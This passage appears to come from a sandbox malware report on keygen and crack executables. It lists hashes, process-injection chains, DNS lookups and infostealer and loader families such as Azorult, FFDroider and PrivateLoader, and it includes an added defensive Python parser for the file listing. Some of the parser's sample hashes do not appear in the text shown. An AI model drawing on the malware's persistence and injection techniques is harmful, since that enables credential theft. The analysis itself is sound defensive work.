SHA512 22fc43246530b47c90db34156b89b72b4ccd83235935596b88d12b553f3e391eece74945ccef2a6f5f1f17b9d1365b0f054333479153724460240f209e61f91e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 4d198dc8b5537aafcf730de1dcff3f06
SHA1 a422f585d7a06ab4047c3e20684093ad267df519
SHA256 2db81892c1a6eee9966e5a7a14f13e726b5f4e58df202d34a07e462af1b9a97d
SHA512 20eade490afadb2eee6787ab8c9767baf388bf6d67a46b2f3db4cf15130540e3c2b84a0d2b986f567e69428a1567a3f8fad76cc7a47def44d9e90bb104cad02b

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.INTEG.RAW

MD5 57810caec9c9ed3bf2ab94c05906c73e
SHA1 25702f7e16d1214adfddf86f6bab7bf1cde58925
SHA256 c08384ed67e2029f1ad83f5fd5bb8e21c6c32986631c2f207d5545a15a3e9abc
SHA512 63edc99f8f3a5fa932471fb7fe63e296dec369311490bba45c0f3af3617f78ae74c37e15a24fdae1953fba697a5474d474a0b9e686f9b065061d221cac3d01fc

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 c1d374bbf69940bd1c05f6aa8992ee04
SHA1 5a6fb2a66b59b195f4aa67cf8a78ff4c8ad4a182
SHA256 8ebfef9e3babc4dc4b79d2c6e0b96b7a53342c2af15d93ea63d4549c3435df24
SHA512 d5840a6dc572f3a3db2b393521fe054f02fa4c232f1868c365f550ef5c33699f98b154a77658d732382cedd21ac2a836c5c9f5d53d997cfd9b16d33741ae5abf

memory/3192-683-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/3624-703-0x0000000000C70000-0x0000000000C8E000-memory.dmp

memory/3624-704-0x0000000002CE0000-0x0000000002CFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1380-733-0x00000000007F0000-0x00000000007F6000-memory.dmp
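The Files listing above is flat text: a path, then MD5/SHA1/SHA256/SHA512 lines, with memory dumps interleaved. Two patterns in it are worth pulling out mechanically rather than by eye. RarSFX1\d.jfm is captured many times with a different hash each time, which means the same file was rewritten repeatedly during the run (a .jfm is the flush-map file the Windows ESE database engine keeps beside a database, here beside the file d). And f2217e5f.exe and ss.exe reappear later on this page under RarSFX0 in behavioral7 with identical hashes, so they are one payload dropped in two runs. The parser below is an added example for this report, not sandbox output or code from the malware; the helper names are mine, and SAMPLE is a constructed excerpt whose paths and hashes are copied from this page's Files sections (SHA512 lines omitted for brevity). The full listing parses the same way.

```python
"""Parse a sandbox 'Files' listing and spot files that were rewritten or dropped more than once.

Added example for this report, not sandbox output or malware-author code. Helper names are
mine. SAMPLE is a constructed excerpt: paths and hashes are copied from this page's Files
sections (SHA512 lines dropped for brevity); the real listing parses the same way.
"""
import re
from collections import defaultdict

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 3bb4b4505ce6c5738c72dec43ab484f5
SHA1 683df579e991662847c47512c76f2d63cc71ffe5
SHA256 2aa3799965a5ac0c627169a3b0f4fb35129ea0c8183e32d68c9ae3c363ab3aa5

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d

MD5 1842e65634f9f62d8bb51b0d914e4f47
SHA1 ea58c7d9d5d6c269de19cd8ad3fc9b451fcde7e6
SHA256 26e0a6441dd096bf405a25648aa68c4a9ec20c12e6268413c1b303825a1e6bec

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9bca4bb723492631598e89c7db9177a3
SHA1 22d73a5b0c27af1d016df8518e7786e3c1201399
SHA256 ca8847bba444075938a8f2c7b29e3ecee3362a850a6b9f3b4f9d66532e731c8d

memory/3192-683-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a

\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")


def parse_files(text):
    """Return (records, memory_dumps). Each record is {'path': ..., 'MD5': ..., 'SHA256': ...}."""
    records, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                raise ValueError("hash line without a preceding path: " + line)
            current[m.group(1)] = m.group(2)
            continue
        if line.startswith("memory/"):
            dumps.append(line)           # memory dumps carry no hashes in this format
            continue
        current = {"path": line}          # anything else is a new file path
        records.append(current)
    return records, dumps


def normalize(path):
    """Drop the drive letter and lower-case, so 'C:\\Users\\..' and '\\Users\\..' compare equal."""
    return re.sub(r"^[A-Za-z]:", "", path).lower()


def rewritten_paths(records):
    """Paths captured more than once with different content: {normalized path: distinct SHA256 count}."""
    by_path = defaultdict(set)
    for r in records:
        if "SHA256" in r:
            by_path[normalize(r["path"])].add(r["SHA256"])
    return {p: len(h) for p, h in by_path.items() if len(h) > 1}


def redropped(records):
    """SHA256 values seen under more than one path (same payload dropped in several places or runs)."""
    by_hash = defaultdict(set)
    for r in records:
        if "SHA256" in r:
            by_hash[r["SHA256"]].add(normalize(r["path"]))
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
```

Running rewritten_paths over the full section reports d.jfm with one distinct hash per capture, and redropped over the Files sections of both runs ties the RarSFX1 and RarSFX0 copies of f2217e5f.exe and ss.exe together by content rather than by name.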

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20241010-en

Max time kernel

13s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp

Files

memory/2380-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

memory/736-1-0x0000000000A20000-0x0000000000B05000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/3616-13-0x0000000000B40000-0x0000000000C25000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

53s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
